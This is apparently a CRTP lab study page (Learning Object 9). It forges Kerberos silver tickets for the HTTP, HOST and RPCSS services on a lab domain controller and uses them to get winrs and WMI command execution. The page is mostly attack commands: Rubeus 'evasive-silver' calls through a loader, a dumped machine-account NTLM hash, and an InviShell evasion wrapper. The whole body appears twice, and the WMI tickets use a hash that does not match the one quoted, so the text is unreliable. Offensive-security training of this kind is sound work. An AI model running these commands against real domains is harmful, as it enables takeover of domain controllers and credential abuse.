Certified Red Team Professional (CRTP) - Notes

Home GitHub Portfolio Twitter/X Medium Cont@ct

9 - LO9️

Learning Object 9

Previous8 - LO8️Next10 - LO1️0️

Last updated 2 days ago

9 - LO9️

Learning Object 9

Tasks

1 - Try to get command execution on the domain controller by creating silver ticket for:

HTTP
WMI

Flag 18 [dcorp-dc] - The service whose Silver Ticket can be used for winrs or PowerShell Remoting 🚩

Solutions

1 - Try to get command execution on the domain controller by creating silver ticket for:

Based on the last task we already have the hash for the machine account of the domain controller (dcorp-dc$).

RID  : 000003e8 (1000)
User : DCORP-DC$
LM   :
NTLM : e4ce16e20da2e11d2901e0fb8a4f28b0

HTTP

We can create a Silver Ticket that provides us access to the HTTP service (WinRM) on DC:

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-silver /service:http/dcorp-dc.dollarcorp.moneycorp.local /rc4:e4ce16e20da2e11d2901e0fb8a4f28b0 /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt

We can check if we got the correct service ticket:

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args klist

And run klist or C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args klist we can see it

http/dcorp-dc.dollarcorp.moneycorp.local @ DOLLARCORP.MONEYCORP.LOCAL

let's try accessing it using winrs. Note that we are using FQDN of dcorp-dc as that is what the service ticket has:

winrs -r:dcorp-dc.dollarcorp.moneycorp.local cmd
set username
set computername

WMI

For accessing WMI, we need to create two tickets: one for HOST service and another for RPCSS.

We can start to run the following commands from an elevated shell:

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-silver /service:host/dcorp-dc.dollarcorp.moneycorp.local /rc4:c6a60b67476b36ad7838d7875c33c2c3 /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-silver /service:rpcss/dcorp-dc.dollarcorp.moneycorp.local /rc4:c6a60b67476b36ad7838d7875c33c2c3 /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt

Verify that tickets generated are present:

let's try to use WMI commands on the domain controller:

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
Get-WmiObject -Class win32_operatingsystem -ComputerName dcorp-dc

Flag 18 [dcorp-dc] - The service whose Silver Ticket can be used for winrs or PowerShell Remoting 🚩

As we can see in the previous task the XXXX service can be used for winrs or PowerShell Remoting.

Previous8 - LO8️Next10 - LO1️0️

Last updated 2 days ago

Tasks

1 - Try to get command execution on the domain controller by creating silver ticket for:

HTTP
WMI

Flag 18 [dcorp-dc] - The service whose Silver Ticket can be used for winrs or PowerShell Remoting 🚩

Solutions

1 - Try to get command execution on the domain controller by creating silver ticket for:

Based on the last task we already have the hash for the machine account of the domain controller (dcorp-dc$).

RID  : 000003e8 (1000)
User : DCORP-DC$
LM   :
NTLM : e4ce16e20da2e11d2901e0fb8a4f28b0

HTTP

We can create a Silver Ticket that provides us access to the HTTP service (WinRM) on DC:

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-silver /service:http/dcorp-dc.dollarcorp.moneycorp.local /rc4:e4ce16e20da2e11d2901e0fb8a4f28b0 /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt

We can check if we got the correct service ticket:

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args klist

And run klist or C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args klist we can see it

http/dcorp-dc.dollarcorp.moneycorp.local @ DOLLARCORP.MONEYCORP.LOCAL

let's try accessing it using winrs. Note that we are using FQDN of dcorp-dc as that is what the service ticket has:

winrs -r:dcorp-dc.dollarcorp.moneycorp.local cmd
set username
set computername

WMI

For accessing WMI, we need to create two tickets: one for HOST service and another for RPCSS.

We can start to run the following commands from an elevated shell:

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-silver /service:host/dcorp-dc.dollarcorp.moneycorp.local /rc4:c6a60b67476b36ad7838d7875c33c2c3 /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-silver /service:rpcss/dcorp-dc.dollarcorp.moneycorp.local /rc4:c6a60b67476b36ad7838d7875c33c2c3 /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt

Verify that tickets generated are present:

let's try to use WMI commands on the domain controller:

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
Get-WmiObject -Class win32_operatingsystem -ComputerName dcorp-dc

Flag 18 [dcorp-dc] - The service whose Silver Ticket can be used for winrs or PowerShell Remoting 🚩

As we can see in the previous task the XXXX service can be used for winrs or PowerShell Remoting.